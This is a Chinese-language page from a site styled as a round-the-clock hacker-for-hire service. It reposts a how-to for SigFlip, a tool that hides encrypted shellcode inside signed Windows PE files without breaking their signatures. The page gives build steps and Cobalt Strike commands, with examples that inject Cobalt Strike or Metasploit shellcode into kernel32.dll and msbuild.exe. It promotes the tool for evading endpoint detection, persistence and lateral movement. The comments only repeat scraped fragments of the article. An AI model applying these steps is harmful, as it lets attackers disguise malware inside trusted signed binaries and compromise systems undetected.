黑客24小时在线接单的网站

黑客24小时在线接单的网站

2022年04月03日 17:01:00

如何使用SigFlip篡改身份认证码签名的PE文件

关于SigFlip

SigFlip可以篡改身份证码签名PE文件(exe、dll、sys等)工具,整个过程不会影响或破坏现有身份认证码的签名。换句话说,我们可以使用它SigFlip向PE数据嵌入文件(例如Shellcode),不会破坏文件签名、完整性检查或PE修改文件功能时PE文件的验证和或哈希。

SigInject组件可以将Shellcode注入至PE文件的[WIN_CERTIFICATE]在证书表中输出加密钥配合BOF/C/C#加载器(SigLoader)一起使用。SigInject将保存针对PE修改文件,确保其签名和证书的有效性不变。

SigLoader它是一种基本的加载器SigInject修改后的创建PE以文件路径和解密钥为参数,然后提取和解密嵌入Shellcode,以供选择Shellcode注入使用。

SigFlip将检查PE哈希是否成功改变,然后退出以绕过终端检查此类行为。

SigFlip可用于持久感染、横向渗透、命令/代码执行等场景。

注意事项:igFlip、SigInject和SigLoader将以BOF脚本和.NET提供程序集。

工具安装

大多数研究人员可以使用以下命令将项目源代码克隆到当地:

  • gitclonehttps://github.com/med0x2e/SigFlip.git

    • 构建/编译工具

    该项目未提供预编译BOF,我们可以用Mingw-w64编译。如果是的话.NET,可以使用VS或csc.exe来编译.NET项目(SigFlip、SigLoader);如果是BOF,按以下步骤操作:

  • ➜i686-w64-mingw32-gcc-csigflip.c-osigflip.x86.o
  • ➜x86_64-w64-mingw32-gcc-csigflip.c-osigflip.x64.o
  • ➜x86_64-w64-mingw32-gcc-cSigLoader/sigloader.c-osigloader.x64.o
  • ➜i686-w64-mingw32-gcc-cSigLoader/sigloader.c-osigloader.x86.o

    • 确保所有对象文件都存储在内sigflip.cna在相同的目录下,然后在Cobalt Strike中加载sigflip.cna。

    注:预编译BOF使用的是mingw-64 v8.0.0_3,假如你用的mingw-64 >= v9,崩溃可能发生。

    Cobalt Strike

    执行程序集:

  • execute-assemblySigFlip.exe-h
  • execute-assemblySigLoader-h

    • BOF:

    当我们在Cobalt Strike中加载sigflip.cna之后,我们将注册两个新命令,此时我们可以使用以下方法SigFlip和SigInject了。

                     
    • SigFlip:修改签名或证书或证书有效性的情况PE文件哈希:
      •                
    • SigFlip"<PE\_FILE\_PATH>""<OUTPUT\_PE\_FILE\_PATH(withextension)>"
      •                
    • SigInject:向PE文件的[WIN_CERTIFICATE]加密注入证书表Shellcode,打印的加密密钥可以跟随基础C/C#加载器结合使用以保证签名和证书的完整性:
      •                
    • SigInject"<PE\_FILE\_PATH><OUTPUT\_PE\_FILE\_PATH(withextension)>""<SHELLCODE\_FILE>"
      •                
    • SigLoader:从PE由文件中加载SigInject加密的Shellcode,然后使用Early Bird注入指定过程Shellcode,我们可以自定义Shellcode注入逻辑,或直接替换目标代码:
      •                
    • SigLoader<PE_FILE_PATH_WITH_SH><DECRYPTION_KEY><SPAWNTO_PROCESS_PATH><PARENT_PROCESS_ID>

    样品用于工具

    (1) BOF

    向msbuild.exe注入随机数据:

  • SigFlip"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe""C:\lolbins\modified-msbuild.exe"

    • 向kernel32.ell注入Shellcode:

  • SigInject"C:\Windows\System32\kernel32.dll""C:\random\modified-kernel32.dll""C:\shellcode\cobaltstrike_or_msf_shellcode.bin"
  • Sigloader"C:\random\modified-kernel32.dll""DECRYPTION_KEY""C:\Windows\System32\werfault.exe"6300

    • (2) 执行程序集

    向msbuild.exe注入随机数据:

  • execute-assemblySigFlip.exe-bC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe-oC:\Temp\MSBuild.exe

    • 向kernel32.ell注入Shellcode:

  • execute-assemblySigFlip.exe-iC:\Windows\System32\kernel32.dll-sC:\Temp\x86shellcode.bin-oC:\Temp\kernel32.dll-eTestSecretKey
  • execute-assemblySigLoader.exe-fC:\Temp\modified-kernel32.dll-eTestSecretKey-pid2354

    • 项目地址

    SigFlip:【GitHub传送门】

       

    标签:SigFlip 身份认证 安全工具 

    作者:访客 , 分类:网络钓鱼 , 浏览:790 , 评论:5

    • 评论列表:
    •  瑰颈勒言
       发布于 2022-06-13 02:24:24  回复该评论
    • ike中加载sigflip.cna。注:预编译BOF使用的是mingw-64 v8.0.0_3,假如你用的mingw-64 >= v9,崩溃可能发生。Cobalt Strike执
    •  弦久十驹
       发布于 2022-06-12 22:37:24  回复该评论
    • 克隆到当地:gitclonehttps://github.com/med0x2e/SigFlip.git构建/编译工具该项目未提供预编译BOF,我们可以用Mingw-
    •  惑心鸽吻
       发布于 2022-06-12 23:51:25  回复该评论
    • Framework\v4.0.30319\MSBuild.exe-oC:\Temp\MSBuild.exe向kernel32.ell注入Shellcode:execute-assemblySigFlip
    •  双笙野の
       发布于 2022-06-13 04:42:28  回复该评论
    • d-kernel32.dll-eTestSecretKey-pid2354项目地址SigFlip:【GitHub传送门】    
    •  鸽吻绮筵
       发布于 2022-06-13 04:38:16  回复该评论
    • 关于SigFlipSigFlip可以篡改身份证码签名PE文件(exe、dll、sys等)工具,整个过程不会影响或破坏现有身份认证码的签名。换句话说,我们可以使用它SigFlip向PE数据嵌入文件(例如Shellcode),

    发表评论:

    Powered By

    Copyright Your WebSite.Some Rights Reserved.